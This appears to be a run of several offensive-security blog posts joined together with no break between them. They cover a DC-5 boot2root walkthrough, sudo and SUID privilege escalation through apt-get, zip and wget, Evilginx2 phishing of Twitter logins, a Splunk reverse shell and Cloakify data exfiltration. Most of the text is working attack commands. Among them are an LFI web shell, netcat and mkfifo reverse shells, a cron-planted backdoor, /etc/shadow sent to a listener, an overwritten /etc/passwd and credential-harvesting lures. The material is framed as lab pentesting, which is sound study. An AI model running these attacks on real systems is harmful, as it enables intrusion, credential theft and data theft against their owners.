Today we are going to take another boot2root challenge known as “DC-5”. The credit for making this VM machine goes to “DCAU” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download it from here.

Security Level: Medium

Penetration Methodology

Scanning

• Discovering Targets IP
• Network scanning (Nmap)

Enumeration

• Surfing HTTP service port
• Abusing CMS using LFI 
• Checking Ngnix Access Logs

Exploiting

• Exploiting LFI vulnerability using Burpsuite
• Using Netcat to get the reverse shell
• Spawning a tty shell

Privilege Escalation

• Checking SUID binaries
• Kernel Privilege Escalation
• Accessing root directory
• Capture the flag

Walkthrough

Scanning

Let’s start off with scanning the network to find our target.

netdiscover

We found our Targets IP Address 192.168.1.108. Our next step is to scan our targets IP Address with nmap.

nmap -A 192.168.1.108

Enumeration

From nmap result we found HTTP service is running on port 80. So, we browsed the Targets IP Address in the browser.  Let’s explore the webpage for hints.

While exploring the page, we found a contact form which seems interesting. We filled the form and submitted it.

After submitting the form we were redirected to Thankyou.php page, we notice the Copyright says 2019.

On refreshing the page multiple times, we notice changes in Copyright year i.e 2020 AND 2019 where it was called on thankyou.php file. I try to fuzz this URL but it was not that much easier and after spending some time I test for LFI.

Therefore, I Quickly checked for LFI Vulnerability by obtaining the /etc/passwd file as shown below.

After going through various files path, we found the nginx access log file.

Let’s capture the request of the Nginx Access log file using Burpsuite. Here we will be using LFI to exploit apache access log.

Exploiting LFI

In place of the file path, we have injected a Code to get the command line access by making a GET request to the Server.

<?php system($_GET['cmd']) ?>

To verify that it is working or not, we have added a new parameter to the URL i.e &cmd=id. Therefore from the output, it confirms we have successfully executed the command on the server.

Using netcat shell with cmd. This will give us a reverse shell over our netcat listener which we have executed alongside.

nc -e /bin/bash 192.168.1.110 1234

Booyah!! We have got the reverse shell. To get the proper shell, we have Spawn the Python TTY Shell. Without wasting much time, I looked for SUID enabled binaries and here /bin/screen-4.5.0 looks interesting.

nc -lvp 1234

Privilege Escalation

It quickly strikes us to look for this term screen-4.5.0 using searchsploit. And what we got was a LOCAL PRIVILEGE ESCALATION Exploit. We have copied the exploit on our system.

searchsploit screen 4.5.0
searchsploit -m 41154

When we didn’t find any appropriate method to execute this shell script for post exploitation then I go with manual compilation and review its code using cat command.

cat 41154.sh

If you will notice the following code then you will observe this script is written in C language and we have divided it into three part for manual compilation.

• Copy Red highlighted the code and past it in a text document and save it as libhax.c
• Copy Yellow highlighted the code and past it in a text document and save it as rootshell.c

At last copy remaining code (Green) and past it in a text document and save it as 41154.sh

From given below image you can see I have pasted the above copied code inside libhax.c

From given below image you can see I have pasted above copied inside rootshell.c

From given below image you can see I have pasted above remaining copied inside 41154.sh and save all three text document inside the /etc directory on our system.

Let’s compile our C program file manually in our local system using gcc. Similarly, compile rootshell.c file.

gcc -fPIC -shared -ldl -o libhax.so libhax.c
gcc -o rootshell rootshell.c

Since we have stored all the files in a folder shell, now let’s upload them into the target’s system using python server.

python -m SimpleHTTPServer

Let’s just downloading all the files inside the /tmp folder of the previous reverse shell.

wget http://192.168.1.110:8000/41154.sh
wget http://192.168.1.110:8000/libhax.so
wget http://192.168.1.110:8000/rootshell

After making the file executable and running, we have got the root access. One final thing to do is to read our FINAL FLAG.

chmod 777 41154.sh
./41154.sh
id
cd /root
ls
cat thisistheflag.txt

Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 3 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here

The post DC-5 Vulnhub Walkthrough appeared first on Hacking Articles.

In this article, we’ll talk about APT (apt-get) functionality and learn how helpful the apt command is for Linux penetration testing and how we’ll progress apt to scale the greater privilege shell.

Table of Content

Introduction to APT (apt-get)

• Major Operation performed using APT (apt-get)

Exploiting APT (apt-get)

• Sudo Rights Lab setups for Privilege Escalation
• Exploiting Sudo rights: Method -I
• Exploiting Sudo rights: Method -II
• Exploiting Sudo rights: Method -III
• Crontab Lab setups for Privilege Escalation
• Exploiting Cron job

Introduction to APT (apt-get)

The apt command is a powerful command-line tool, which works with Ubuntu’s Advanced Packaging Tool (APT) performing such functions as installation of new software packages, upgrade of existing software packages, updating of the package list index, and even upgrading the entire Ubuntu system.

Actions of the apt command, such as installation and removal of packages, are logged in the /var/log/dpkg.log log file.

For further information about the use of APT type:

apt-get -h

Major Operation performed using APT (apt-get)

• Update the Package: The APT package index is essentially a database of available packages from the repositories defined in the /etc/apt/sources.list file and in the /etc/apt/sources.list.d directory. To update the local package index with the latest changes made in the repositories, type the following:

apt-get update

• Upgrade Packages: Over time, updated versions of packages currently installed on your computer may become available from the package repositories (for example security updates). To upgrade your system, first update your package index as outlined above, and then type:

apt-get upgrade
apt-get dist-upgrade

• Install a Package: we can Installation of packages using the apt tool which is quite easy. For example, to install the OpenSSH-server, type the following:

apt-get install openssh-server

• Un-install a package: we can use remove command to un-install software packages without removing their configuration files.

apt-get remove openssh-server

• Remove Installed packet: To remove software packages including their configuration files, use the ‘purge’ subcommand as shown below.

apt-get purge openssh-server

Exploiting APT (apt-get)

Sudo Rights Lab setups for Privilege Escalation

The behaviour of apt-get gets changed when running with higher privilege. Let’s suppose the system admin had given sudo permission to the local user to run apt-get. This is can be led to privilege escalation once the system is compromised.

First all let’s revise what is sudo Permission?

In Linux/Unix, a sudoers file inside /etc is the configuration file for sudo rights. The word sudo represent Super User Do Root privilege task. Sudoers file is that file where the users and groups with root privileges are stored to run some or all commands as root or another user.

So here, we had given sudo privilege to test user to run apt-get as root. To add sudo right open etc/sudoers file and type following as user Privilege specification.

test   ALL=(ALL) NOPASSWD: /usr/bin/apt-get

Exploiting Sudo rights: Method -I

Let’s exploit apt-get service by abusing sudo user right. Suppose we had local user access of the targeted system and we want to escalate the root user rights.

So, first, we connect to the target machine with ssh and type following command to get access through local user login.

ssh test@192.168.1.108

Then we look for sudo right of “test” user (if given) and found that user “test” can execute the apt-get command as “root” (since he has ALL user’s right) without a password.

sudo -l

To exploit sudo right through apt service we just run the following command which will invoke bash for us with root privilege as shown in the below image.

sudo apt-get update -o APT::Update::Pre-Invoke::= /bin/bash

Exploiting Sudo rights: Method-II  

We may use apt-get for viewing changes in the packaged version of a project. We can, therefore, enter the following command in order to call a changelog, which dumps in the editor, like Man, data relating to changes to the source package.

sudo apt-get changelog apt

This will open the console like a Man editor to read the apt changelog, here we can inject “!/bin/sh” and press enter to execute bash shell for us.

You get “#” shell that means that we successfully escalated the root shell, as shown in the following picture.

Exploiting Sudo rights:  Method-III

We can use dpkg to construct a package instead of using apt-get to invoke bin/bash. We will first build a temp file, in which we construct a packaging to call /bin/bash, and then install the package via apt-get.

TF=$(mktemp)
echo 'Dpkg::Pre-Invoke {"/bin/sh;false"}' > $TF
sudo apt-get install -c $TF sl

Crontab Lab setups for Privilege Escalation

This strategy is based upon a situation in which we assume that apt.conf.d can be written in order to plan a cronjob job to update the package with the command apt-get update. As we have said, we gave /adt-conf.d complete permission.

chmod 777 apt.conf.d
ls -al

And then schedule the task using crontab to schedule an update of the software after 2 minutes every time as shown the below image

*/2 *     ***        root       apt-get update

Exploiting Cron job

Let’s exploit apt-get service by abusing cron job as we all know cron job run as root. Suppose we had access to the targeted system locally and want the root user rights to enhanced limited shell access.

So, first we connect to the target machine with ssh and type following command:

ssh test@192.168.1.108

And we know apt.conf.d file has full permission as said above (You can also manually check to ensure the writable directory using find command) in the lab setup. Therefore, we will create a malicious file inside apt.conf.d by injecting netcat reverse backdoor:

echo 'apt::Update::Pre-Invoke {“rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc KALI_IP 1234 >/tmp/f”};’ > pwn

Start the netcat listener to access the reverse connection of the host machine and wait for 2 minutes to obtain the privilege shell since apt-get update task is scheduled to update the packages every time, after minute through crontab that runs as root and it runs our netcat backdoor pwn to get reverse connections as depicted in the image.

References:

https://gtfobins.github.io/

https://help.ubuntu.com/lts/serverguide/apt.html.en

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Linux for Pentester: APT Privilege Escalation appeared first on Hacking Articles.

Today We are going to tell you that how can we perform Privilege Escalation with Zip command. As we all know that Zip is an easy platform-based file packaging and compression utilities for Unix-like systems like Linux, Windows, etc. The Zip program is used for compressing and packaging documents.

Table of Content 

• Introduction to ZIP
• Major functions of ZIP command
• Sudo Rights Lab setups for Privilege Escalation
• Exploiting Sudo rights

Introduction to ZIP

Zip is helpful for packaging a number of distribution files, archiving files, and disk storage by compressing unused files or directories momentarily. You can pack a whole directory structure into a single command zip archive. For text files, 2:1 to 3:1 compression ratio is commonplace. But that’s not all. What else we can do with the Zip command. Let’s think out of the box. Now we are doing something creative which might have not tried before; that is, we are trying Privilege Escalation with Zip command. Let’s understand how. In order to perform this first, we will tell you what a Zip command does in Linux. So, let’s start.

Major Operations Performed Using ZIP command          

First, we will run zip -h command which means help; it tells you about all the options available in zip command as shown in the picture below.

zip -h

So, our first step is to make a directory. We will first create a directory by the name Ignite and then I will create some text files into this by using touch command.

As you can see, we have created three text files by the name of file1.txt, file2.txt, file3.txt in this folder Ignite. Now we will zip file1.txt and file3.txt and give this file a name zip file.zip followed by the file names.

After this step, we will use ls -la command to check the list of the files.

Delete with -d option

-d option – It deletes the file from the zip file. You can delete a file from the archive with the -d option after generating a zip file as we did with file3.txt. We are using -d command to delete file3.txt from the zip file. So first we will specify the zip file name from where we want to delete the file.

zip -d file.zip file3.txt

Update with -u option

so, you will notice that file3.txt is deleted from the file.zip. Now we want to update the zip file and add a text file directly into the zip file. So, we will use -u option

zip -u file.zip file2.txt

by using the above command, you will notice that file2.txt is directly added into the zip file. i.e. file.zip

Move Multiple files with -m option

Now we will first create files of different extensions in our named Ignite. As you can see that we have created two files of txt, two files of pdf extension and two files of jpg extensions. So, we have files with different extensions. In order to move files of different extensions in a zip file then we need to use -m option. Here you can see that we are using -m option to move all text files in zip file. So, we will run the following command-

zip -m 1.zip *.txt

As we can check through ls -la that all are text files has been moved into a zip file and as well as all the text files are deleted from their original destination; which reflects that we have performed it successfully. So, we are now trying this on pdf and jpg files as well to move them in a 1.zip zip file.

Execute system command using zip

You might have not thought of what else we can do with zip command. We can run any Linux command with the zip file as we are going to do. First, we will make one txt file with touch command as we have done above. The file named raj.txt is created. Now we are trying to execute any Linux command through zip command. Run the following command along with zip file and we will get the output.

zip 1.zip raj.txt -T --unzip-command="sh -c ifconfig"

As you can see that we have executed the system command through zip command.

Exploiting Zip

Sudo Rights Lab setups for Privilege Escalation

The behaviour of zip gets changed when running with higher privilege. Let’s suppose the system admin had given sudo permission to the local user to run zip. This is can be led to privilege escalation once the system is compromised. So here we are going to put test user in the sudoers file so that test user has root the privileges to run zip command as sudo user.

Now imagine can we have Privilege shell of victim’s pc by exploiting zip program. It’s very difficult to even think of but very easy to perform. So, let’s do that. First, go to kali’s terminal and connect ubuntu with ssh as we have done in below-

ssh test@192.168.1.108

Well-done. We have connected through ssh successfully.

Now we will run sudo -l command to check the list the entries of sudo files which are a member of the sudoers file. In the list, we can see that test is a member of the sudoers file and can run the zip program with root privilege.

Let’s exploit!!

Now first we will create a file with touch command as we have created a file raj.txt and now we will compress the raj.txt and through zip file, we are taking a shell. So that we will run the following command-

sudo zip 1.zip raj.txt -T --unzip-command="sh -c /bin/bash"

Now we can see that we have successfully taken the shell of the victim’s machine through zip command.

Author: Geet Madan is a Certified Ethical Hacker, Researcher and Technical Writer at Hacking Articles on Information Security. Contact here

The post Linux for Pentester : ZIP Privilege Escalation appeared first on Hacking Articles.

This is the successor of Evilginx 1, and it stays in-line with the MITM lineage. This tool is designed for a Phishing attack to capture login credentials and a session cookie. 

Table of Content

Overview

Setup

• Perquisites
• Installation
• Domain Setup
• Priming Evilginx

Execution

• Lure Creation
• Attack Simulation

Overview

One of the biggest concerns in today’s cyberspace is Phishing, it’s one of those things that uses what a user is familiar with against them. This is a MITM attack framework that sits between the user and site that they are trying to access to potentially steal their credentials. The framework is written in GO and implements its own HTTP and DNS server, making the setup process a breeze.

Setup

Let’s get acquainted with Evilginx2. The first thing we need to do is setup the Evilginx2 application on our attacking machine, let’s get the IP.

ifconfig

Perquisites

Evilginx has a few requirements before it can be installed and start working optimally, let’s take of them first.

We use pscp to upload the go install file to our attacking machine, defining where it can find the file and the credentials and IP of the destination machine. Go is a prerequisite for setting up evilginx. You can get Go 1.10.0 from here.

pscp.exe c:\go1.10.linux-amd64.tar.gz root@68.183.85.197:/tmp/go1.10.linux-amd65.tar.gz

Once we have to Go in our machine we unpack and install it. Pscp deposited our Go file in the tmp folder. We will now be using the following commands to install Go and check its version:

cd /tmp/
ls
tar -C /use/local -xzf go1.10.linux-amd64.tar.gz
export PATH=$PATH:/use/local/go/bin
source $HOME/ .profile
go version

Go needs to be added to ~/.profieles now, here’s how you do it:

Open the. profiles file in nano or any other text editor and type in the following

export GOPATH=$HOME/go
export PATH=$PATH:/usr/local/go/bin:$GOPATH/bin

Next, install git make by typing the following:

apt-get install git make

Installation

Now we are ready to install Evilginx, let’s see how.

go get -u github.com/kgretzky/evilginx2
cd $GOPATH/src/github.com/kgretzky/evilginx2
make
make install

Let’s launch Evilginx by running the script.

./evilginx

There is multiple built-in options that the attacker can utilize to choose a site template called Phishlets.

Domain Setup

Evilginx works as a relay between the victim and the legitimate website that they are trying to access, to achieve this, the attacker needs a domain of their own. There are plenty of resources on the web from where a free domain can be attained temporarily, we used one such resource. We have setup an attacking domain: userid.cf.

The IP of our attacking machine is used in the IP address for the nameserver, if you recall, we noted it earlier on in the process.

Priming Evilginx

This is the part where we prime Evilginx for the attack. At the Evilginx terminal, we use the help command to see the various general configuration options that it has.

help

We need to configure Evilginx to use the domain name that we have set up for it and the IP for the attacking machine.

config domain userid.cf
config ip 68.183.85.197

Time to setup the domains. We have used the twitter phishlet with our domain and Evilginx gives us options of modified domain names that we can setup in our hosting site

phishlets hostname twitter twittwer.com.userid.cf
phishlets get-hosts twitter

In our hosting site, we set the A record, which will the IP of the attacking machine and then copy and paste the domain names provided by Evilginx. One thing to note here, we don’t need to copy the “userid.cf” part, we just need the preceding string.

Execution

We now have everything we need to execute a successful attack using Evilginx.

The settings have been put into place, now we can start using the tool for what it is intended

phishlets enable twitter

Lure Creation

We now need a link that the victim clicks on, in Evilginx, the term for the link is “Lures”.

The help command shows us what options we must use for setting up the lures.

help lures

The lures have to be attached with our desired phishlet and a redirect has to be set to point towards the legitimate website that we are trying to harvest credentials for. Once the lures have been configured, we can see what the configurations yield.

lures
lures create twitter
lures edit redirect_url 0 =’https://www.twitter.com’
lures
lures get-url 0

Attack Simulation

When a victim clicks on our created lure, they will be sent to out phishlet, as can be seen below.

The victim enters their credentials and we see Evilginx capturing them and relaying them to the attack machines terminal.

This is a great tool to explore and understand phishing but at the same time, be sure to use it in a controlled setting.

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher  Contact Here

The post Evilginx2- Advanced Phishing Attack Framework appeared first on Hacking Articles.

In this article, we are going to exploit SPLUNK using the reverse shell. One can find this beneficial in exploiting and do penetration testing of SPLUNK environment of their respective IT infrastructure.

Table of Content

• Introduction to SPLUNK
• Deploying SPLUNK on UBUNTU
• Exploiting SPLUNK using a reverse shell

What is SPLUNK?

Splunk Enterprise Security (ES) is a security information and event management (SIEM) solution that provides insight into machine data generated from security technologies such as network, endpoint, access, malware, vulnerability and identity information. It is a premium application that is licensed independently from Splunk core.

Splunk (the product) captures, indexes, and correlates real-time data in a searchable repository from which it can generate graphs, reports, alerts, dashboards, and visualizations.

For more information read from here.

Deploying SPLUNK on UBUNTU

Now we will continue with penetration testing of SPLUNK on LINUX platform (here we are using UBUNTU), the same can be performed on the windows platform as well.

Visit https://www.splunk.com and register there for downloading the free trial version of SPLUNK. Since we are going to continue with UBUNTU we have downloaded the Splunk for Linux 64 bit (.tgz file).

Once it gets downloaded on your UBUNTU machine, follow the process below for creating an instance of SPLUNK:

Open terminal, go to downloads and extract file using

tar -zxfv  splunk-7.3.0-657388c7a488-Linux-x86_64.tgz

Now follow these commands for installing splunk:

mv splunk /opt
cd /opt
cd splunk
cd bin/
/opt/splunk/bin/splunk start --accept-license

When asked enter the username and password you need to configure for Splunk.

Once done you should see the following screen with URL of your Splunk GUI

Go to http://ubuntu:8000 (URL of your Splunk GUI) and enter the user id and password you configured earlier:

Exploiting SPLUNK using a reverse shell

In the first phase, we have discussed how we can deploy Splunk in our local machine (Ubuntu) and in this phase, we will go with Splunk penetration testing where we will try to exploit Splunk for obtaining reverse shell of the machine.

For exploiting Splunk first now download the latest released shell from the following the link:

https://github.com/TBGSecurity/splunk_shells/archive/1.2.tar.gz

Now login to Splunk GUI from your kali machine visiting the IP of Ubuntu server: 8000 (192.168.0.37:8000) and login

Navigate to the “App: Search & Reporting” option and click on “Search & Reporting”

Click on the “Install app from file” option.

For installing any app slunk provides upload form to browse any .spl or .tar.gz for uploading. Taking advantages of functionality we will try to upload our Splunk shell that we had downloaded previously.

After uploading restart your Splunk instance.

Once restarted, go to apps tab again, Find your installed archive (weaponize Splunk for red teaming and pen testing)

We scroll down to find our shell file as shown below. Before we can run, it we need to click on the “Permissions” option to change its permissions.

Click on permissions and change to all apps as shown below:

Now to execute the shell. We navigate to the search option in Splunk and type in our command defining that we want a reverse shell of standard type to talk to out attach machines IP on the listening port.

| revshell std 192.168.0.7 1234

Now go to Kali Linux and open a terminal:

Start netcat using following command on any port you wish (here I have used 1234)

nc -lvp 1234

Hmmm!! As you can observe that by executing id command we show root uid and gid information but for obtaining proper tty shell we need to break jail.

We used Msfvenom to create a python payload.

msfvenom -p cmd/unix/reverse_python lhost=192.168.0.7 lport=4444 R

The payload is uploaded through our existing Netcat session, all that needed to be done was the payload to be pasted into the terminal and executed but do not forget to run netcat listener inside a new terminal.

A new Netcat session is started on the port (4444) that we defined in our payload and we see the execution occur flawlessly. Once this netcat session is started run following command:

python –c 'import pty;pty.spawn("/bin/bash")'

And after executing the command we can see that shell is gained.

Meterpreter Session

If you are hoping for a meterpreter session then you can use a multi handler for obtaining reverse connection of victim’s machine.

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload python/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.0.7
msf exploit(multi/handler) > set lport 9999
msf exploit(multi/handler) > exploit-j

Type following to execute a reverse shell

| revshell msf 192.168.0.7 9999

Boooom!! We got the meterpreter session.

And in this way saw Splunk penetration testing 

Author: Shivendu Vikram Singh Cybersecurity engineer Working in TCS as a Pentester Contact Here

The post Penetration Testing on Splunk appeared first on Hacking Articles.

In this article, we are going to describe the entire utility of Wget command and how vital it is in Linux penetration testing. As Wget is used for downloading the files from the server so here we will learn that what else we can do by this command in Privilege Escalation.

Table of Content

Introduction to Wget

• Major Operation performed using Wget

Exploiting Wget

• Sudo Rights Lab setups for Privilege Escalation
• Exploiting Sudo rights
• SUID Lab setups for Privilege Escalation
• Exploiting SUID

Introduction to Wget

The Wget command is a command line utility that enables the user to download single or multiple files simultaneously from internet or server by the help of many protocols like HTTP, HTTPS and FTP. This command performs many operations that can be used by any user while downloading any file from the internet such as: Downloading multiple files, downloading in the background, resuming downloading, renaming any downloaded file, Mirror downloading.

The more functionality of this command can be briefly understood by using its help command. Here we are using -h argument for this function. As we can see by the below image which showing list of many arguments that can be used with Wget command while executing it. For viewing as below image, we will simply type the command on our Linux screenshot as showing below:

wget -h

Major Operation performed using Wget

To download a file:  Wget command provides assistance to their use for downloading any file/webpage in both platforms i.e. in front of the current processing screen and also in the background. Here I’m downloading putty.exe file in this article to show the overall working process of Wget command. Type below command to download a single file which use the simple syntax: Wget (option) URL

wget https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe

To download a file in background: As we know Wget is a non-interactive downloader that allows the user to download the file in the background too without creating any hassle with the current process.

Here I’m using -b argument for this task following by the whole command as mentioned below.

wget -b https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe

To overwrite documents to file: Here in the below image, we are showing how one can move the documents of the downloaded file to any other file. We will use the -O (uppercase) argument for this function.

Type the below-mentioned command for the same, in which I have download putty.exe and obtain the output inside raj.exe.

wget -O raj.exe https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe

After completing half download I’m pausing my file by simply pressing ctrl + c to stop my downloading in mid of session just to explain “how we can retrieve or resume our downloading” if we have any network failure issue power cut or any other reasons that can stop our downloading process.

To resume any downloading process: As I have mentioned above if we have any issue or problems that can tend to fail in our downloading process by any mean then we can resume our uncompleted download by -c arguments. Find the below-mentioned command as per screenshot:

wget -c -O raj.exe https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe

To download multiple files simultaneously:  Wget also allows the user to download multiple files simultaneously instead to download it one by one. Suppose we have any folder that contains multiple links and we want to download all the files together so we will use this command following by -i arguments.

Here I’m creating a file by the name of “link” which contains two links and I want to download both links together. Type the below-mentioned command for performing the same task:

cat link
wget -i link

To turn off output: Whenever we want to turn off the output of any downloading process then we can use -q arguments for the same. This argument helps the user to download the file in the background by turning off its standard output i.e. downloading the file with complete silence.

We will use Wget command with -q argument for this as shown below.

wget -q https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe

There so many options inside wget but in this post, we have discussed very of them. Because our vision is to demonstrate privilege escalation by exploiting wget, therefore in the next phase you will learn how to exploit wget for escalating root shell.

Exploiting wget

Sudo Rights Lab setups for Privilege Escalation

Now we will set up our lab of Wget command with higher privilege i.e. with administrative rights. As we know the behaviour of many commands get changed after getting higher privileges similarly, we will check for the Wget command that what impact it has after getting sudo rights and how we can use it further for privilege escalation.

Refer to this link for more information about sudo rights

It can be clearly understood by the below image in which I have created a local user (test) who possess all sudo rights as root and can perform all task as admin.

To add sudo right open etc/sudoers file and type following as user Privilege specification.

test  ALL=(root) NOPASSWD: /usr/bin/Wget

Exploiting Sudo rights

Now we will start exploiting Wget service by taking the privilege of sudoer’s permission. Suppose we got the sessions of victim’s machine that tend us to have local user access of the targeted system through which we can escalate the root user rights.

Very first we will connect to the target machine with ssh, therefore, type following command to get access through local user login.

ssh test@192.168.1.22

Then we look for sudo right of “test” user (if given) and found that user “test” can execute Wget command as “root” (since he has ALL user’s right) without a password.

sudo -l

Wget utilized the post-file option to send the content of any file. So, here we will use wget command to transfer the content of the /etc/shadow file.

Syntax: sudo /usr/bin/wget --post-file=<path of file> <Listening IP>

Since post-file will transfer the content of shadow file to the listening IP therefore, we should turn on the listener on the destination machine. Hence open a new terminal and start the netcat listener for receiving the sent data from the source machine.

Type the below command:

sudo /user/bin/wget --post-file=/etc/shadow 192.168.1.17

As we had already turned on the netcat listener on port 80 to receive the content inside the “hash” file.

nc -lvp 80 > hash

After this, we will acquire the content of the shadow file of the victim’s machine inside our hash file and then we will use john the ripper to crack the hash value.

Syntax: john <file name>
john hash

Hmmm!! As we can observe from the given below image that it has cracked the password for user raj.

Since we got the credentials for the account of the user: raj so now, we can easily switch the user and will login as raj and further we tried to access root shell by switching.

su raj
sudo su

And finally, we got the root access hence in this way we spawn the root shell by exploiting wget command.

SUID Lab setups for Privilege Escalation

SUID: Set User ID is a type of permission that allows users to execute a file with the permissions of a specified user. Those files which have suid permissions run with higher privileges.  Assume we are accessing the target system as a non-root user and we found suid bit enabled binaries, then those file/program/command can run with root privileges.

Read more from here: https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/

Now we are going to give SUID permission on wget so that a local user can take the privilege of wget as the root user.

Hence type following for enabling SUID bit:

which wget
chmod u+s /usr/bin/wget
ls -al /usr/bin/wget

Exploiting SUID

Now again compromise the target’s system and use find command to identify binaries having SUID permission.

find / -perm -u=s -type f 2>/dev/null

So here we came to know that SUID bit is enabled for so many binary files, but we are interested in /usr/bin/wget.

As we know, wget has suid permission and taking advantage of this right we will try to escalate the root privilege by injecting a new user inside the /etc/passwd file.

First, we will open our /etc/passwd file following by tail command which will read this file from its end and help us to know that the file ends with the user “test”.

Now we are creating the salt value of password for our new user and this will be done by using “openssl” following by the command as mentioned in the screenshot below.

openssl passwd -1 -salt ignite pass123

And we will get our hash value something like this: “$1$ignite$3eTbJm980Hz.k1NTdNxe1”; copy it for further use.

On moving ahead for the completion of this task now I have copied the entire content of /etc/passwd file in our local machine and will edit a new record for the user “ignite” then paste the above-copied hash password in the record as shown below.

Name this file as passwd and run python HTTP server for transferring this file into victim’s machine.

python -m SimpleHTTPServer

Now we want to inject our modified passwd file inside /etc folder to replace the original passwd file. We will use wget with -O to download the passwd file from our machine (Kali Linux) inside a/etc directory which will overwrite the existing passwd file.

cd /etc
wget -O passwd http://192.168.1.108:8000/passwd

Now let’s switch to ignite that owns the root user’s privileges and access the root shell.

su ignite
password: pass123
id

Hence you can notice from the given below image we have escalated the root privilege by abusing

SUID permission on wget.

Author: Komal Singh is a Cyber Security Researcher and Technical Content Writer, she is completely enthusiastic pentester and Security Analyst at Ignite Technologies. Contact Here

The post Linux for Pentester: Wget Privilege Escalation appeared first on Hacking Articles.

In our previous post, we had already discussed on “Cloud Storage Uploads for data exfiltration” and today we are going to discussed “Concealed Method for Data Exfiltration” to extract the unauthorized data. Here you will learn how an intruder can exfiltrate data through steganography approach.

Table of Content

• Overview
• About Data Exfiltration
• Cloakify Installation and Usages (for Linux)
• Method -I
• Method II
• Cloakify Installation and Usages (for Windows)

Overview

We will perform red team practice, where we will attempt to collect the important files from the victim’s machine by inducing steganography with the help of concealed methods. When copying information from the destination machine, we will try to transform the data to befool the network monitors so that they can not identify the data packet travelling in the network.

All this could be performed by using a single tool named “Cloakify Factory”.

Cloakify Factory transforms any filetype (e.g .zip, .exe, .xls,etc.) into a list of harmless-looking string. This lets you hide the file in plain sight and transfer the file without triggering alerts. The fancy terms for this “text-based steganography”, hiding data by making it look like other data. Cloaked files defeat signature-based malware detection tools.

About Data Exfiltration

Data exfiltration occurs when malware and/or a malicious actor carries out an unauthorized data transfer from a computer. It is also commonly called data extrusion or data exportation. Data exfiltration is also considered a form of data theft. During the past couple of decades, a number of data exfiltration efforts severely damaged the consumer confidence, corporate valuation, and intellectual property of businesses and national security of governments across the world.

Methods of Data Exfiltration

Open Methods:

• HTTP/HTTPS Downloads & Uploads
• FTP
• Email
• Instant Messaging
• P2P filesharing

Concealed Methods:

• SSH
• VPN
• Protocol Tunneling
• Cloud Storage Uploads
• Steganography
• Timing channel

(From Wikipedia)

Cloakify Installation & Usages (for Linux)

CloakifyFactory – Data Exfiltration & Infiltration In Plain Sight; Convert any filetype into a list of everyday strings, using Text-Based Steganography; Evade DLP/MLS Devices, Defeat Data Whitelisting Controls, Social Engineering of Analysts, Evade AV Detection.

Only you need to type following for downloading the cloakify from GitHub in the target machine.

git clone https://github.com/TryCatchHCF/Cloakify.git
cd Cloakify.py
chmod -R 777 noiseTools

Let’s run the python script to lunch cloakifyfactory.py

python cloakifyFactory.py

CloakifyFactory is a menu-driven tool that leverages Cloakify Toolset scripts. When you choose to Cloakify a file, the scripts first Base64-encode the payload, then apply a cipher to generate a list of strings that encodes the Base64 payload. You then transfer the file however you wish to its desired destination. Once exfiltrated, choose Decloakify with the same cipher to decode the payload.

Let’s take an example now that we want to copy a text file “pwd.txt” from within the target system containing the login credentials of different machines in the network.

Method -I

It may be dangerous to copy the text file directly, so we will transform the input file data into another file as output. To do so follow the below steps:

1. Run the python script to launch cloakifyfactory.py
2. Press 1 to select cloakify a file option
3. Enter the path of the source file that you want to transform an the input file.
4. Enter the path of the destination file to where you want to save the output.

Further, you will get a list of ciphers, choose the desired option for encrypting the file. Suppose I want the whole content to get changed into facial emojis.

1. Press 3 for emoji cipher
2. Allow to Add noise to cloaked file by pressing Y for yes.
3. Then press 1 to select prependemoji.py as a noise generator.

This will save the output result inside the raj.txt file.

As result, you will get the output content something like shown in the below image.

Now if you want to obtain the output result in its original format, then you can go with the decloakify option which will revert the transformation into its original existence, but before that, you have to give all permissions to removeNoise.py

chmod 777 removeNoise.py

To do so follow the below steps:

1. Run the python script to launch cloakifyfactory.py
2. Press 2 to select decloakify a file option
3. Enter the path of the file that you want to restore back into its original format.
4. Enter the path of the file to where you want to save the output.

Press Y to answer yes because we have added noise to cloaked file and select noise generator.

Method II

Again, we have a similar file that we want to cloaked into another format directly without operating the cloakifyfactory console.

This time you can use a single command to cloak the file by adding specify the type of cipher as given below:

python cloakify.py /root/Desktop/pwd.txt ciphers/starTrek

After executing the above command, we can observe the output result would be something like this as shown in the below image.

So we have used the file.txt file as destination file to save the transformed information inside it without printing the output result on the screen. Moreover, further, we have used decloak command to revert the transformed file back into its original state.

python cloakify.py /root/Desktop/pwd.txt ciphers/starTrek > /root/Desktop/file.txt
python decloakify.py /root/Desktop/pwd.txt ciphers/starTrek

Cloakify Installation and Usages (For Windows)

As we all know this is an exfiltration tool and data could be exfiltrate from any platform either from Linux or Windows based OS, therefore cloakifyfactory has built the application both platforms. In the 1^st phase, we have use python-based application for Linux machine and now remotely we are going to deploy cloakify factory inside Windows machine using MSI package of python for our python based application.

Thus, we downloaded the MSI package in our local machine (Kali Linux):

wget https://www.python.org/ftp/python/2.7/python-2.7.msi

Now our purpose is to show how an intruder can remotely exfiltrate the data using cloakifyfactory. So, we had compromised the system first and got the meterpreter session and then uploaded the MSI package inside the victim’s machine to install the dependency required for python.

upload python-2.7.msi .
shell
msiexec /i python-2.7.msi /qn

Now download the zip file for cloakifyfactory from GitHub in your local machine.

We also need to download 7-zip exe program for extracting the cloakify-master.zip.

Now extract the 7za920.zip  and you will get the 7za.exe file that we have to inject in the victim’s machine.

Now let’s upload 7za.exe and cloakfy-master.zip in the remote system. And further, use the 7za.exe program to unzip the cloakify-master.zip.

Therefore, execute the following command:

upload /root/Downloads/Cloakify-master.zip .
upload /root/Downloads/7za.exe
shell
7za.exe x cloakify-master.zip

Now we want to transfer the secret.txt file of the compromised machine but directly copying the file might generate the alert, therefore, we will transform the data as done above.

